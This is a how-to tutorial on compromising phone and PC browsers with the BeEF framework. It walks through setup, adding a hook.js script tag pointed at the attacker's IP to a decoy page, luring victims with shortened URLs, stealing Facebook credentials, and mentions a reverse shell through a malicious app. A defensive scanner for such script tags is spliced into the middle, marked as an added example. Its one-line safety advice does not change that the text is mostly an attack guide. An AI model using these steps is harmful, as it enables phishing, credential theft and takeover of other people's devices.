Hacking Devices Using a Webpage
We have all heard about the various attacks that attackers (hackers) carry out using malicious webpages.
How do these attackers perform such attacks? Let's see how they are carried out, and how to stay secure.
Requirements:
- Linux (Kali Linux preferred)
Tools:
- BeEF Framework
- Apache server
Installation:
1. BeEF Framework: Kali Linux generally comes with the BeEF Framework pre-installed. If you are using another Linux distribution or the tool is missing, it can be installed as described below.
If the tool is already installed, start it with:
$ cd /usr/share/beef-xss
$ ./beef
If the tool is not installed, install it with the following commands:
Prerequisites:
BeEF requires Ruby 2.3 (or newer). Refer to your operating system documentation for instructions to install the latest stable version of Ruby.
# Debian based systems
sudo apt-get install ruby ruby-dev
# RedHat / Fedora
sudo yum install ruby ruby-devel
If your operating system's package manager does not provide Ruby 2.3 (or newer), you can add the Brightbox PPA repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng
Downloading:
$ git clone https://github.com/beefproject/beef
Installing:
Go into the downloaded folder and execute the following command:
$ ./install
Start BeEF:
To start BeEF, simply run:
$ ./beef
2. Apache server: to install the Apache server, enter the following command in your shell:
$ sudo apt-get install apache2
Configuring:
- In the beef directory, edit the config.yml file and change the username and password if needed (optional).
- Now run ./beef to start the BeEF framework. The startup output shows the URL of the UI panel, which the attacker (in this case, us) uses to view the BeEF framework.
3. Now open that URL in your browser to reach the panel. Enter the username and password you set and log in (if you did not change them, the defaults are username: beef, password: beef).
4. Now start the Apache server with the following command in your terminal:
$ service apache2 start
Now that the service is active, we need to configure and customize our HTML page.
We customize the page so that it looks convincing to the victim. The HTML file is located at the following path; open it and add the script line below:
$ cd /var/www/html/
$ nano index.html
(customize your HTML page as required and add the following line to your code)
<script src="http://<ip-address>/hook.js" type="text/javascript"></script>
(replace <ip-address> with your hooking address)
I've made a simple HTML page for the demo.
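From the defender's side, the tell-tale sign of a page like this is a script loaded from a foreign origin, often a bare IP address over plain HTTP, under the name hook.js. The scanner below is an added example, not part of the original tutorial or of BeEF: it parses an HTML page with the standard library and flags such script tags; the page URL, the sample HTML and the 192.0.2.10 address are constructed placeholders.

```python
# Added example: flag externally loaded <script> tags in an HTML page (e.g. a hook.js tag).
from html.parser import HTMLParser
import ipaddress
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag.lower() == "script" else None
        if src:
            self.srcs.append(src)


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def find_suspicious_scripts(html, page_url):
    """Return [(src, reasons)] for each script a reviewer should question.
    Reasons: cross-origin, ip-literal, plain-http, hook-name (file is hook.js)."""
    page_host = urlsplit(page_url).hostname or ""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        url = urlsplit(urljoin(page_url, src))  # resolve relative src against the page
        host = url.hostname or ""
        reasons = []
        if host != page_host:
            reasons.append("cross-origin")
        if _is_ip_literal(host):
            reasons.append("ip-literal")
        if url.scheme == "http":
            reasons.append("plain-http")
        if url.path.rsplit("/", 1)[-1].lower() == "hook.js":
            reasons.append("hook-name")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: a local script plus the tutorial's hook pattern,
# with a documentation-range IP (192.0.2.10) standing in for the real address.
SAMPLE_HTML = ('<html><head><script src="/js/app.js"></script>'
               '<script src="http://192.0.2.10/hook.js" type="text/javascript"></script>'
               '</head><body><h1>Welcome</h1></body></html>')
```

Running the scanner over a crawled or proxied copy of a page gives a quick triage list; a same-origin HTTPS script produces no finding, while the hook tag above is reported with all four reasons.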
Attack
1. After all the setup is done, we proceed with the attack. Send the URL to the victim, either by pointing a DNS name at your IP address or by shortening the URL with https://tinyurl.com/.
2. When the victim opens the URL, you get the details of the victim's device in the panel. In this case, I will be using a mobile device.
3. Now let's head to the Commands section and look at the various attacks that are possible.
4. Let's show an alert on the mobile device stating "you are hacked."
5. As another example, we will see how to get Facebook credentials.
6. Now we have taken what we need. As we can see, this is one of the methods of attacking the victim; the victim could also be prompted to install a malicious app, which would give us a reverse shell.
7. This works not only on mobile devices but also on PCs.
Conclusion
So, as we have seen, an attacker (hacker) can obtain a great deal of information with petty tricks.
To stay secure, don't visit untrusted web portals or enter your credentials on them; that is what leads to these kinds of attacks.
(For other tutorials on BeEF, please comment.)